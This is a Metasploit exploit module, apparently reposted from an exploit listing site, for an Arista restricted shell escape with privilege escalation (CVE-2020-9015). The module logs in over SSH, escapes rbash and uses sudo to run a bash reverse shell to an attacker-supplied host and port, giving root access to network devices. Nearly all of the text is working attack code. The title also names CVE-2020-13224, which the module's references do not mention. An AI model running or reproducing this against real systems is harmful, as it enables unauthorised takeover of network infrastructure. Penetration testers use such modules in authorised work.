Exploit for Arista Restricted Shell Escape - Privilege Escalation CVE-2020-13224 CVE-2020-9015

Name: Exploit for Arista Restricted Shell Escape - Privilege Escalation CVE-2020-13224 CVE-2020-9015
Rating: 5 (202 reviews)
2020-06-21 | CVSS 9.0
## https://sploitus.com/exploit?id=0DAYDB:CA23A1A8C6470BF4E3277E72F3A5D4D8
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Arista restricted shell escape (with privesc)',
        'Description' => %q{
          This exploit module takes advantage of a poorly configured TACACS+ config,
          Arista's bash shell and TACACS+ read-only account to privilage escalate.
          A CVSS v3 base score of 9.8 has been assigned.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Chris Anders'],
        'References' =>
        [
          [ 'CVE', '2020-9015'],
          [ 'URL', 'http://www.securitybytes.me/posts/cve-2020-9015/'],
          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015' ],
          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9015' ],
        ],
        'Arch' => ARCH_X86,
        'ConnectionType' => 'find',
        'DefaultTarget' => 0,
        'DefaultOptions' =>
        {
          'Payload' => 'linux/x86/shell_reverse_tcp'
        },
        'DisclosureDate' => 'Feb 02 2020',
        'Platform' => 'linux',
        'PayloadType' => 'cmd_interact',
        'Privileged' => true,
        'Targets' => [ [ 'Universal', {} ] ]
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true, 'Username to login with', '']),
        OptString.new('PASSWORD', [true, 'Password to login with', '']),
      ]
    )

    register_advanced_options(
      [
        Opt::Proxies,
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),
        OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', false])
      ]
    )
  end

  def check
    factory = ssh_socket_factory
    opts = {
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      use_agent: false,
      config: false,
      password: password,
      proxy: factory,
      non_interactive: true,
      verify_host_key: :never
    }

    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        Net::SSH.start(rhost, username, opts)
      end
    rescue Rex::ConnectionError
      return CheckCode::Safe
    rescue Net::SSH::Disconnect, ::EOFError
      return CheckCode::Safe
    rescue Timeout::Error
      return CheckCode::Safe
    rescue Net::SSH::AuthenticationFailed
      return CheckCode::Safe
    rescue Net::SSH::Exception
      return CheckCode::Safe
    end

    CheckCode::Detected

  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def lport
    datastore['LPORT']
  end

  def lhost
    datastore['LHOST']
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def exploit
    factory = ssh_socket_factory

    opts = {
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      use_agent: false,
      config: false,
      password: password,
      proxy: factory,
      non_interactive: true,
      verify_host_key: :never
    }

    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, username, opts)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
    rescue ::Timeout::Error
      fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
    end

    fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
    begin
      payload_executed = false
      print_good('SSH connection established.')

      ssh.open_channel do |channel, _data|
        print_status('Requesting pty rbash')

        channel.request_pty do |ch, success|
          fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
          print_good('PTY successfully obtained.')

          print_status('Requesting a shell.')
          ch.send_channel_request('shell') do |cha, _succ|
            fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
            print_good('Spawned into arista rbash shell.')

            cha.on_data do |_xx, data2|
              if data2.include? '#'
                if !payload_executed
                  print_status('Attempting to break out of Arista rbash...')
                  channel.send_data("show run | grep '' | sudo bash -c 'bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1 2>&1 &'\n")
                  payload_executed = true
                  print_good('Escaped from rbash!')
                end
              end
            end
          end
        end
      end
      ssh.loop unless session_created?
    rescue Errno::EBADF => e
      elog(e.message)
    end
  end
end